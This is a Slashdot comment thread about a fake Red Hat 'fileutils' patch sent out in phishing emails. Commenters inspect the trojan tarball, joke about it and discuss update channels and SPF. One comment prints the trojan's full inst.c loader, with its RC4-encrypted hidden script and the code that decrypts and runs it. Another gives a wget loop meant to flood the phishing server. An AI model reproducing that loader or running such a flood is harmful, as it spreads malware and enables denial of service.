Use the /. effect for good (3, Funny)

JamesTRexx (675890) | more than 9 years ago | (#10617093)

Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D

Re:Use the /. effect for good (0, Redundant)

sfire (175775) | more than 9 years ago | (#10617138)

And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

It's Yahoo hosting (1)

Theatetus (521747) | more than 9 years ago | (#10617227)

Not exactly the box most likely to get pwned by somebody.

Re:Use the /. effect for good (1)

joeljkp (254783) | more than 9 years ago | (#10617209)

$ while true; do wget http://fedora-redhat.com/index.htm; rm index.htm; sleep 1; done

Cry havoc! (1)

LittleLebowskiUrbanA (619114) | more than 9 years ago | (#10617094)

and let slip the trolls of Slashdot! Let's see how long before this guy gets hacked and his personal IP address/physical address are posted on here.

You can almost feel sorry for the guy :)

Re:Cry havoc! (1, Redundant)

sfire (175775) | more than 9 years ago | (#10617122)

And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

Re:Cry havoc! (1)

LittleLebowskiUrbanA (619114) | more than 9 years ago | (#10617170)

Yeha, this will be an interesting write up sooner or later. First of its kind for OSS if I'm not mistaken. Guess we're finally Enterprise level Microsoft now.

Source code! (1)

pac1085 (801480) | more than 9 years ago | (#10617095)

Well, whatever it is, it comes with its source code! inst.c is in the tarball, check it out.

Re:Source code! (1, Insightful)

Anonymous Coward | more than 9 years ago | (#10617136)

Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.

Must be some mistake (-1, Troll)

stratjakt (596332) | more than 9 years ago | (#10617105)

There is absolutely no malware of any sort for linux. Linux is magical and can't run any code that does bad things.

Re:Must be some mistake (0)

Anonymous Coward | more than 9 years ago | (#10617134)

You're an idiot.

Re:Must be some mistake (1)

Nikker (749551) | more than 9 years ago | (#10617140)

But did they allow you to download the source ???

Confidence (2, Insightful)

FiReaNGeL (312636) | more than 9 years ago | (#10617111)

OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.

Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

Re:Confidence (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617161)

Yes, of course they do. Red Hat Enterprise has Red Hat Network, SUSE has YOU, and Fedora Core has GPG signed distro channels.

When I set up a system for a "non-technical user", I set up the patches to be automatic (they go through a rigorous QA assessment -- I've never seen a "bad" patch in a final version of Fedora Core). I also don't give the NTU the root password, or install development utils -- so there's no way this phish/trojan could affect one of the systems I administer.

Re:Confidence (1)

FiReaNGeL (312636) | more than 9 years ago | (#10617179)

I hate to show my ignorance, but this is an excellent thing ;) And...

In Soviet Russia, SUSE has YOU! :P

Re:Confidence (1)

Mentorix (620009) | more than 9 years ago | (#10617211)

Yes, redhat has a webbased update page, but you can do it semi-automatically as well now. Doesn't work as good as with some other distro's in my experience.

Debian and Gentoo have built software management policies right into their core system. Just click on update and let the machine take care of itself. All annoying dependency stuff gets taken care off by itself and security updates can be scheduled to run automatically.

Looking at the files.. (1, Informative)

schmiddy (599730) | more than 9 years ago | (#10617121)

First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c , and a binary file "fileutils-patch.bin".

Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

I think there's at least stuff in there to crack your password file since I see:
key(pswd, sizeof(pswd_t));
in there. I'm guessing the binary patch file does some nasty stuff as well.

P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

fileutils-4.1.9-11
=u9F!
5928f30d339e2c8002986120e6abd2e7d4e61921
=u9F!
fileutils
4.1.9
The GNU versions of common file management utilities.
The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
Red Hat Linux
Red Hat, Inc.
Red Hat, Inc.
Applications/File
linux
i386

The amazing thing is (1)

antifoidulus (807088) | more than 9 years ago | (#10617131)

They seem to be able to master phishing and obfuscated code, but they just can't get the English language:
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only.

Trademark infringement... (0)

}InFuZeD{ (52430) | more than 9 years ago | (#10617149)

I'd like to see Redhat sue the owner of the domain for trademark infringement ;)

Obviously it was a malacisious use of the domain, and I think the verdict is pretty much secured, so it would be fun.

Re:Trademark infringement... (2, Funny)

}InFuZeD{ (52430) | more than 9 years ago | (#10617192)

Ok, that was a horrible misspelling of malicious :|

PHEW! (5, Funny)

big daddy kane (731748) | more than 9 years ago | (#10617150)

I'm sure glad I'm using windows!

Re:PHEW! (0, Funny)

Anonymous Coward | more than 9 years ago | (#10617185)

Sooner or later, one of these is gonna compile under Cygwin...

does it or not ? (2, Insightful)

Matt_Joyce (816842) | more than 9 years ago | (#10617153)


It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."


Either it is malicious or not.
Don't they know ?

If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.

What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.

Most users, sure (1)

JustOK (667959) | more than 9 years ago | (#10617155)

Sure, I'm hopping that > 99.99999% of current users will spot this within seconds. Yet, I thought I heard the idea was to get more people using linux. That would include a number of people who get infected in dumb ways on MS. Unless there machines are totally locked down (or adminned by the "linite"), its gonna happen. Maybe it happening now, and proper defenses being designed will be a good thing.

Spelling/Grammar? (2, Informative)

hereschenes (813329) | more than 9 years ago | (#10617156)

"Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

Re:Spelling/Grammar? (1)

ScrewMaster (602015) | more than 9 years ago | (#10617240)

Probably because most of them are in Nigeria.

Linux - Where the malware comes with the source (5, Funny)

cranos (592602) | more than 9 years ago | (#10617160)

Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

Re:Linux - Where the malware comes with the source (1)

Chrispy1000000 the 2 (624021) | more than 9 years ago | (#10617220)

Hey, just be thankful that you *might* not know what you are compiling. You require *real* user intervention to use that viral sig that pop's up from time to time.

Use SPF to protect yourself from phishing (5, Informative)

taubz (322102) | more than 9 years ago | (#10617177)

If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension [for.net] .

(Disclosure: I wrote the plugin. :) )

Re:Use SPF to protect yourself from phishing (0)

Anonymous Coward | more than 9 years ago | (#10617214)

But how do we know that it isn't a trojan? (Is an unsigned, third party extension, not on official update site)

Coding 0, Grammar 0. (5, Funny)

monoi (811392) | more than 9 years ago | (#10617182)

Anybody running RedHat and Fedora are strongly adviced to apply this patch!

But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

Coming soon... (1)

cuteseal (794590) | more than 9 years ago | (#10617195)

*In an ominous voice over*

"This fall... a malicious trojan / virus / spyware... coming soon to a linux terminal near you..."

mkdir and ls? (1)

mrfibbi (695943) | more than 9 years ago | (#10617196)

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.
Because we all know how dangerous and root-related those commands can be. For christ's sake. Can't they at least come up with some sort of sudo-related vulnerability that at least sounds plausible?

Here is the code to inst.c (1)

quantumraptor (818569) | more than 9 years ago | (#10617206)

#if 0
shc Version 3.7, Generic Script Compiler
Copyright (c) 1994-2003 Francisco Rosales <frosal@fi.upm.es>

shc -v -r -T -f redhat
#endif

static long date = 0;
static char mail[] = "Please contact your provider";
static int relax = 1;
typedef char pswd_t[433];
static char pswd[] =
"\112\326\126\023\345\101\227\242\127\260\241\033\ 143\344\132\161"
"\071\320\301\103\056\023\044\053\136\365\273\307\ 014\033\346\213"
"\012\176\145\076\305\057\222\140\013\163\022\014\ 266\152\133\056"
"\055\055\117\325\077\140\120\025\356\256\310\170\ 017\153\162\107"
"\225\266\313\200\345\263\017\174\224\255\001\005\ 012\151\271\322"
"\356\260\322\136\126\347\347\026\162\253\362\224\ 350\150\071\147"
"\347\202\366\114\104\134\277\102\343\302\275\107\ 144\271\053\002"
"\337\045\271\361\045\310\070\327\241\313\227\271\ 163\003\046\026"
"\232\241\345\152\151\375\036\365\323\246\050\227\ 325\140\023\126"
"\020\363\136\323\032\333\176\021\016\325\274\114\ 304\144\171\232"
"\356\176\170\257\340\133\311\172\132\363\307\323\ 312\221\237\373"
"\000\204\246\324\174\215\166\237\276\376\044\320\ 373\345\034\107"
"\355\013\234\346\316\133\072\157\104\317\250\006\ 063\232\321\355"
"\121\202\217\343\207\370\115\072\150\310\231\213\ 151\155\133\166"
"\237\207\324\236\014\107\335\271\306\022\022\257\ 061\133\062\355"
"\213\173\122\100\272\266\257\332\355\302\117\062\ 074\063\275\145"
"\073\056\143\151\031\303\210\151\331\353\262\246\ 336\143\257\210"
"\060\321\040\143\142\001\363\261\302\164\052\125\ 375\160\115\252"
"\354\264\302\050\360\266\132\047\365\053\101\027\ 051\052\165\223"
"\371\316\001\011\027\314\255\273\123\373\356\330\ 035\074\212\313"
"\343\225\026\114\201\154\250\212\064\140\023\114\ 074\226\306\021"
"\236\244\330\037\001\222\135\211\045\047\357\177\ 000\045\024\366"
"\250\215\335\116\171\170\026\335\273\106\037\225\ 366\104\103\162"
"\045\032\371\270\031\067\212\016\113\213\355\103\ 010\063\164\323"
"\354\115\214\262\241\111\230\102\106\172\327\260\ 047\301\146\261"
"\016\241\274\062\024\143\121\117\047\337\141\321\ 311\000\114\134"
"\132\053\236\061\232\035\250\154\016\165\060\141\ 202\212\047\175"
"\352\366\271\064\335\347\045\356\276\220\027";
t ypedef char shll_t[8];
static char shll[] =
"\027\227\104\215\344\060\226\051\353\036\220\073\ 114\040\167\126"
"\012\043\340\355";
typedef char inlo_t[3];
static char inlo[] =
"\036\173\055\223\266\275\074\222\066\027";
typed ef char xecc_t[15];
static char xecc[] =
"\136\317\002\017\371\053\007\345\165\066\036\162\ 266\047\013\261"
"\363\204";
typedef char lsto_t[1];
static char lsto[] =
"\347\047\233\033\245\043\257\234\252\240\037\262" ;
#define TEXT_chk1 "KTZE4lIVf7i4BR"
typedef char chk1_t[15];
static char chk1[] =
"\176\150\322\244\275\145\026\000\230\311\274\166\ 150\124\334\163"
"\053\372\006\215";
typedef char opts_t[1];
static char opts[] =
"\331\051\317\253\133\114\076\242\237\252\144\142" ;
typedef char text_t[1199];
static char text[] =
"\302\214\330\267\274\114\354\115\323\353\153\135\ 350\215\100\341"
"\364\315\074\102\276\122\042\345\157\237\003\103\ 246\341\370\334"
"\354\221\335\166\270\142\306\045\355\173\260\100\ 343\073\063\146"
"\272\171\102\300\274\105\250\172\206\216\255\220\ 343\272\014\043"
"\005\057\144\113\057\373\202\222\234\002\306\356\ 312\144\300\000"
"\075\031\301\120\303\072\027\226\275\353\247\316\ 314\216\216\020"
"\336\171\201\144\221\147\005\234\000\315\131\366\ 044\361\370\107"
"\035\047\377\306\162\105\371\365\173\116\116\060\ 247\262\374\207"
"\101\025\340\324\170\363\223\213\105\102\130\167\ 143\272\341\202"
"\300\054\002\347\171\075\302\156\267\174\071\103\ 174\172\140\326"
"\372\101\071\103\227\326\005\236\151\002\050\343\ 003\265\311\102"
"\132\333\320\366\323\322\112\326\055\242\073\334\ 171\357\115\343"
"\305\111\031\130\153\027\033\266\125\246\265\264\ 246\042\106\253"
"\241\042\333\261\145\205\337\167\175\217\160\026\ 023\364\077\374"
"\327\354\217\270\343\140\123\326\162\002\041\266\ 120\212\154\253"
"\207\157\222\144\144\055\221\302\367\037\256\357\ 147\166\223\266"
"\004\075\221\132\351\347\215\034\017\170\314\341\ 206\171\374\205"
"\344\050\170\353\072\001\247\044\372\304\047\231\ 006\153\352\135"
"\135\006\034\223\012\133\132\074\140\211\130\106\ 072\272\311\132"
"\131\271\012\062\277\262\332\334\026\205\133\227\ 373\036\063\031"
"\121\244\027\357\024\032\143\366\065\102\001\057\ 202\206\271\331"
"\203\020\230\064\330\026\117\160\331\361\372\151\ 163\076\126\260"
"\125\373\333\052\123\170\022\031\121\060\203\314\ 367\161\266\056"
"\227\172\244\065\372\022\275\255\377\277\247\061\ 077\020\142\307"
"\012\157\131\327\024\130\161\213\027\302\105\004\ 240\264\213\307"
"\151\025\001\164\055\350\106\056\252\133\205\116\ 254\047\325\174"
"\347\141\017\276\166\241\356\154\213\015\135\206\ 321\315\004\346"
"\205\331\254\167\107\003\331\125\121\065\175\051\ 016\333\340\370"
"\306\201\166\103\315\366\226\141\307\221\101\372\ 027\352\362\146"
"\234\022\222\101\345\343\055\364\160\161\346\025\ 171\040\064\176"
"\131\317\325\376\015\175\027\152\315\321\274\152\ 330\121\300\342"
"\120\357\357\267\175\064\335\307\074\177\121\142\ 175\352\173\110"
"\053\021\116\172\363\124\143\226\051\360\132\035\ 160\256\252\140"
"\134\216\100\024\226\264\167\125\214\051\146\144\ 163\240\167\260"
"\350\142\173\155\354\156\302\162\202\227\366\312\ 271\352\063\273"
"\370\077\174\235\110\302\151\362\116\203\330\033\ 343\264\071\345"
"\013\265\244\241\355\351\145\377\255\154\032\070\ 025\176\374\313"
"\374\310\130\057\271\132\311\246\024\323\057\172\ 363\316\225\302"
"\216\230\217\103\217\354\324\144\133\201\254\337\ 170\260\310\251"
"\154\122\123\050\044\107\216\160\306\105\022\370\ 055\043\211\241"
"\363\356\162\172\015\246\210\266\131\237\065\205\ 263\037\217\270"
"\153\246\032\255\271\217\301\232\353\056\255\235\ 154\047\353\167"
"\066\362\333\066\153\174\214\352\367\223\077\322\ 343\234\354\252"
"\102\372\071\126\374\137\165\060\047\140\032\040\ 267\044\053\100"
"\342\152\227\160\306\054\025\325\133\074\166\246\ 014\146\000\001"
"\221\073\055\061\267\146\150\076\132\364\101\146\ 113\336\305\377"
"\133\357\233\324\346\032\052\310\322\156\245\165\ 340\021\303\153"
"\060\053\153\137\234\226\023\132\134\024\156\121\ 053\221\125\227"
"\205\241\304\002\231\303\322\271\142\111\275\222\ 073\346\073\320"
"\055\267\026\333\267\136\253\352\346\060\034\076\ 045\032\374\222"
"\375\352\237\203\315\014\351\123\306\331\175\254\ 370\130\036\343"
"\071\336\273\221\165\260\053\250\003\331\046\317\ 121\176\053\342"
"\106\323\106\316\117\362\206\346\212\322\165\356\ 133\145\026\377"
"\263\263\307\255\216\137\352\251\122\241\156\121\ 033\074\365\256"
"\315\335\231\137\040\030\201\302\104\017\005\012\ 233\217\266\377"
"\043\113\203\055\064\121\234\266\222\210\254\011\ 303\113\350\341"
"\200\307\352\130\040\310\142\107\315\141\005\225\ 061\010\162\373"
"\013\344\220\122\205\224\016\311\220\240\343\260\ 226\130\215\160"
"\241\120\117\321\147\324\147\317\207\136\117\033\ 002\206\347\340"
"\122\117\157\274\060\022\071\250\140\130\307\201\ 317\100\146\256"
"\126\135\302\253\250\022\250\274\221\051\172\270\ 265\156\003\107"
"\035\337\153\160\126\335\263\217\143\233\000\214\ 345\246\354\303"
"\050\040\361\331\060\020\354\007\322\047\104\124\ 030\303\156\035"
"\250\222\242\001\236\104\061\246\132\272\224\365\ 003\065\165\363"
"\210\042\362\123\222\274\124\343\024\124\153\056\ 023\110\031\340"
"\023\035\214\057\143\276\374\211\270\156\057\304\ 015\311\317\032"
"\073\156\151\170\006\272\265\134\040\125\204\000\ 002\033\273\074"
"\053\007\211\131\205\300\212\136\275\134\233\226\ 210\161\101\107"
"\215\253\220\174\242\323\025\007\246\267\046\371\ 245\326\265\221"
"\157\130\027\103\017\320\077\027\361\317\135\156\ 125\042\067\154"
"\271\336\152\162\102\224\240\307\316\174\111\174\ 104\312\111\075"
"\065\215\320\004\073\353\151\154\077\365\131\050\ 216\003\233\027"
"\045\323\162\175\043\212\121\114\315\363\026\214\ 053\232\345\315"
"\011\202\002\306\307\240\054\103\225\063\302\230\ 332\047\177\225"
"\211\056\354\376\215\332\206\337\124\375\135\207\ 033\344\130\233"
"\331\051\202\216\147";
#define TEXT_chk2 "O0AFdy47Rzu8"
typedef char chk2_t[13];
static char chk2[] =
"\162\047\213\323\345\143\301\204\175\267\026\301\ 110\344\301\113"
"\026\111\043\027\120\103\262\203\176\107\337";
t ypedef char hide_t[4096];

#define DEBUGEXEC 0 /* Define as 1 to debug execvp calls */
#define TRACEABLE 1 /* Define as 1 to enable ptrace the executable */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/**
* 'Alleged RC4' Source Code picked up from the news.
* From: allen@gateway.grumman.com (John L. Allen)
* Newsgroups: comp.lang.c
* Subject: Shrink this C code for fame and fun
* Date: 21 May 1996 10:49:37 -0400
*/

static unsigned char state[256], indx, jndx;

/*
* Reset rc4 state.
*/
void state_0(void)
{
indx = jndx = 0;
do {
state[indx] = indx;
} while (++indx);
}

/*
* Set key. Can be used more than once.
*/
void key(char * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
while (len > 0) {
do {
tmp = state[indx];
jndx += tmp;
jndx += ptr[(int)indx % len];
state[indx] = state[jndx];
state[jndx] = tmp;
} while (++indx);
ptr += 256;
len -= 256;
}
}

/*
* Crypt data.
*/
void rc4(char * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
jndx = 0;
while (len > 0) {
indx++;
tmp = state[indx];
jndx += tmp;
state[indx] = state[jndx];
state[jndx] = tmp;
tmp += state[indx];
*ptr ^= state[tmp];
ptr++;
len--;
}
}

/*
* Key with file invariants.
*/
int key_with_file(char * file)
{
struct stat statf[1];
struct stat control[1];

if (stat(file, statf) < 0)
return -1;

/* Turn on stable fields */
memset(control, 0, sizeof(control));
control->st_ino = statf->st_ino;
control->st_dev = statf->st_dev;
control->st_rdev = statf->st_rdev;
control->st_uid = statf->st_uid;
control->st_gid = statf->st_gid;
control->st_size = statf->st_size;
control->st_mtime = statf->st_mtime;
control->st_ctime = statf->st_ctime;
key((char *)control, sizeof(control));
return 0;
}

#if DEBUGEXEC
void debugexec(char * shll, int argc, char ** argv)
{
int i;
fprintf(stderr, "shll=%s\n", shll ? shll : "<null>");
fprintf(stderr, "argc=%d\n", argc);
if (!argv) {
fprintf(stderr, "argv=<null>\n");
} else {
for (i = 0; i <= argc ; i++)
fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
for (; argv && *argv && *argv != arg; argv++);
for (; argv && *argv; argv++)
*argv = argv[1];
}

int chkenv(int argc)
{
char buff[512];
unsigned mask, m;
int l, a, c;
char * string;
extern char ** environ;

mask = (unsigned)chkenv;
mask ^= (unsigned)getpid() * ~mask;
sprintf(buff, "x%x", mask);
string = getenv(buff);
#if DEBUGEXEC
fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
l = strlen(buff);
if (!string) {
/* 1st */
sprintf(&buff[l], "=%u %d", mask, argc);
putenv(strdup(buff));
return 0;
}
c = sscanf(string, "%u %d%c", &m, &a, buff);
if (c == 2 && m == mask) {
/* 3rd */
rmarg(environ, &string[-l - 1]);
return 1 + (argc - a);
}
return -1;
}

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

void untraceable(char * argv0)
{
char proc[80];
int pid, mine;

switch(pid = vfork()) {
case 0:
pid = getppid();
/* For problematic SunOS ptrace */
sprintf(proc, "/proc/%d/as", (int)pid);
close(0);
mine = !open(proc, O_RDWR|O_EXCL);
if (!mine && errno != EBUSY)
mine = !ptrace(PTRACE_ATTACH, pid, 0, 0);
if (mine) {
kill(pid, SIGCONT);
} else {
fprintf(stderr, "%s is being traced!\n", argv0);
kill(pid, SIGKILL);
}
_exit(mine);
case -1:
break;
default:
if (pid == waitpid(pid, 0, 0))
return;
}
perror(argv0);
_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
char buff[512];
char * scrpt;
int ret, i, j;
char ** varg;

state_0();
key(pswd, sizeof(pswd_t));
rc4(shll, sizeof(shll_t));
rc4(inlo, sizeof(inlo_t));
rc4(xecc, sizeof(xecc_t));
rc4(lsto, sizeof(lsto_t));
rc4(chk1, sizeof(chk1_t));
if (strcmp(TEXT_chk1, chk1))
return "location has changed!";
ret = chkenv(argc);
if (ret < 0)
return "abnormal behavior!";
varg = (char **)calloc(argc + 10, sizeof(char *));
if (!varg)
return 0;
if (ret) {
if (!relax && key_with_file(shll))
return shll;
rc4(opts, sizeof(opts_t));
rc4(text, sizeof(text_t));
rc4(chk2, sizeof(chk2_t));
if (strcmp(TEXT_chk2, chk2))
return "shell has changed!";
if (sizeof(text_t) < sizeof(hide_t)) {
/* Prepend spaces til a sizeof(hide_t) script size. */
scrpt = malloc(sizeof(hide_t));
if (!scrpt)
return 0;
memset(scrpt, (int) ' ', sizeof(hide_t));
memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
} else {
scrpt = text; /* Script text */
}
} else { /* Reexecute */
if (*xecc) {
sprintf(buff, xecc, argv[0]);
scrpt = buff;
} else {
scrpt = argv[0];
}
}
j = 0;
varg[j++] = argv[0]; /* My own name at execution */
if (ret && *opts)
varg[j++] = opts; /* Options on 1st line of code */
if (*inlo)
varg[j++] = inlo; /* Option introducing inline code */
varg[j++] = scrpt; /* The script itself */
if (*lsto)
varg[j++] = lsto; /* Option meaning last option */
i = (ret > 1) ? ret : 0; /* Args numbering correction */
while (i < argc)
varg[j++] = argv[i++]; /* Main run-time arguments */
varg[j] = 0; /* NULL terminated array */
#if DEBUGEXEC
debugexec(shll, j, varg);
#endif
execvp(shll, varg);
return shll;
}

int main(int argc, char ** argv)
{
#if DEBUGEXEC
debugexec("main", argc, argv);
#endif
#if !TRACEABLE
untraceable(argv[0]);
#endif
if (date && (date < (long)time(NULL))) {
fprintf(stderr, "%s has expired!\n", argv[0]);
fprintf(stderr, "%s\n", mail);
} else {
argv[1] = xsh(argc, argv);
fprintf(stderr, "%s%s%s: %s\n", argv[0],
errno ? ": " : "",
errno ? strerror(errno) : "",
argv[1] ? argv[1] : "<null>"
);
}
return 1;
}

Good going team "redhat"! (1)

null-sRc (593143) | more than 9 years ago | (#10617231)

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

anyone stupid enough to believe that deserves what they get... mkdir, and ls, yeah ok LOL WTF ROTFL!!!LMAOO

This is a critical-critical update

and they say windows has problems with critical vulnerabilities!! look at this! critical-critical! even more critical than just plain critical! phew i feel safer on windows now. never heard of a critical critical on winupdate ;)
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...